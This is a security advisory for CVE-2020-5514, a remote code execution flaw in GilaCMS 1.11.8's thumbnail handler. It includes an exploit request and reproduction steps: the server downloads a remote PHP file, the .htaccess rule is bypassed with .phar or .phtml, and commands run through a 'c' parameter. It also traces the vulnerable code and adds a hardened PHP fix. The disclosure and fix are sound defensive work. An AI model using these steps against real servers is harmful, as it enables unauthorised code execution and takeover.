GilaCMS 1.11.8 – Remote Code Execution

Product Owner: GilaCMS

Application Name: GilaCMS 1.11.8

CVE ID: CVE-2020-5514

Type: Installable/Customer-Controlled Application

Application Release Date: 4th December, 2019

Severity: Critical

Authentication: Required

Complexity: Easy

Vulnerability Name: Remote Code Execution

Vulnerability Explanation: Remote code evaluation is a vulnerability that can be exploited when user input is injected into a file or a string that is then executed (evaluated) by the programming language’s parser.

Verified In:
Mozilla Firefox 68.2.0esr (64-bit)
Kali Linux 2019.4
Hosted using Apache/2.4.41 (Debian)

Request:
GET /gilacms/lzld/thumb?src={URL_OF_PHP_FILE_TO_UPLOAD}&media_thumb=80 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/gilacms/admin/content/post
Connection: close
Cookie: GSESSIONID=1pz8sgcaj9w4btmw1lrs07sjpw0tv772n9rf6jkd0wlod37sra; media_tab=assets; media_path=assets; asset_path=src%2Fcore%2Fassets
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Steps to Reproduce:
1. Log in to the GilaCMS application as admin.
2. Go to http://localhost/gila/admin/content/post.
3. Right-click on the thumbnail image and click ‘View Image’.

4. From the image URL we can see that the image path is supplied in the ‘src’ parameter.

5. Host an image file on another machine using the XAMPP web server (http://192.168.1.108/poc/).

6. When the ‘src’ parameter is set to a remote image URL, the image is displayed. In addition, the same image is downloaded and stored in /tmp/ and then moved to the /tmp/media_thumb/ folder.

7. Requesting the image file directly in the web browser using its absolute path from the webroot, we can see that the image is present and is displayed.

8. Now, setting the ‘src’ parameter to a remote PHP file, the PHP file is downloaded and stored in /tmp/ but is not moved to the /tmp/media_thumb/ folder.

9. Requesting the PHP file directly from the web browser returns a ‘Forbidden’ error. That is because of the .htaccess file present in the directory, which blocks *.php files.

10. In order to bypass that, a .phar or .phtml file can be uploaded instead.

11. On accessing the uploaded .phar file in a web browser, the PHP code is executed.

12. By passing an additional ‘c’ parameter containing the command to execute, system commands can be run.

Note:
The web server configuration must treat other extensions such as .phar or .phtml as PHP for this to be exploitable.

Vulnerable Code:
The user input (the remote URL of the PHP file) sent in the ‘src’ parameter is stored in a variable named ‘file’ (Line No: 31) and passed to the ‘thumb’ function of class ‘view’ (Line No: 35).

The ‘src’ variable holding the user input is passed to the ‘make_thumb’ function of class ‘image’ (Line No: 407), since the check for whether the file already exists returns false.

The ‘src’ variable is then passed to another function, ‘local_path’ (Line No: 15).

The ‘_src’ variable stores the destination path where the file is to be saved (Line No: 171). The output filename is generated from the ‘src’ variable by replacing certain characters with ‘_’. The built-in PHP function ‘copy’ is used to copy the contents of the remote location stored in ‘src’ to the local path stored in ‘_src’ (Line No: 176). No validation or checks are performed on the file being saved to the tmp/ directory.
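A hardened version of that flow, as an added example (not GilaCMS’s own code): it refuses any ‘src’ carrying a URL scheme or stream wrapper, confines the path to a local asset directory, verifies that the file really is an image, and derives the cache filename itself instead of from user input. ASSET_ROOT, TMP_DIR and safe_thumb_source are assumed names for illustration.

```php
<?php
// Added example, not GilaCMS code: a hardened replacement for the
// "copy($src, $_src) with no checks" pattern described above. ASSET_ROOT,
// TMP_DIR and safe_thumb_source() are assumed names for illustration.

const ASSET_ROOT = '/var/www/html/gilacms/assets';          // assumed local asset dir
const TMP_DIR    = '/var/www/html/gilacms/tmp/media_thumb'; // assumed thumbnail cache
const ALLOWED_IMAGE_TYPES = [IMAGETYPE_JPEG, IMAGETYPE_PNG, IMAGETYPE_GIF];

/**
 * Resolve the user-supplied 'src' parameter to a verified local image and
 * return the cache path the thumbnail should be written to; throws otherwise.
 */
function safe_thumb_source(string $src, int $width): string
{
    // 1. No scheme or stream wrapper (http://, https://, php://, data:, ...).
    //    parse_url() returns null for a plain relative path and false for
    //    garbage, so only null may pass. This alone stops the remote fetch.
    if (parse_url($src, PHP_URL_SCHEME) !== null || strpos($src, "\0") !== false) {
        throw new InvalidArgumentException('remote or wrapper sources are not allowed');
    }

    // 2. Confine to the asset root after realpath(), which defeats ../ traversal.
    $root = realpath(ASSET_ROOT);
    $real = realpath(ASSET_ROOT . '/' . ltrim($src, '/'));
    if ($root === false || $real === false
        || strpos($real, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new InvalidArgumentException('source must be an existing file under the asset root');
    }

    // 3. Check content, not extension: getimagesize() parses the image header,
    //    so a script renamed to .jpg (or .phar/.phtml) returns false here.
    $info = @getimagesize($real);
    if ($info === false || !in_array($info[2], ALLOWED_IMAGE_TYPES, true)) {
        throw new InvalidArgumentException('source is not a supported image');
    }

    // 4. Cache name from a hash plus the *detected* type: the caller never
    //    chooses which extension lands in the writable tmp/ directory.
    $ext = image_type_to_extension($info[2], false); // "jpeg", "png", "gif"
    return TMP_DIR . '/' . hash('sha256', $real . '|' . $width) . '.' . $ext;
}

// The request from the advisory (a remote src) is rejected at step 1.
try {
    safe_thumb_source('http://192.168.1.108/poc/image.png', 80);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Keeping tmp/ non-executable at the web server level (no PHP handler for any extension in that directory) remains a worthwhile second layer, since the .htaccess rule described above blocks *.php only.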

Reference:
Website: https://gilacms.com/
GitHub Repository: https://github.com/GilaCMS/gila
Download Version: https://github.com/GilaCMS/gila/releases/tag/1.11.8
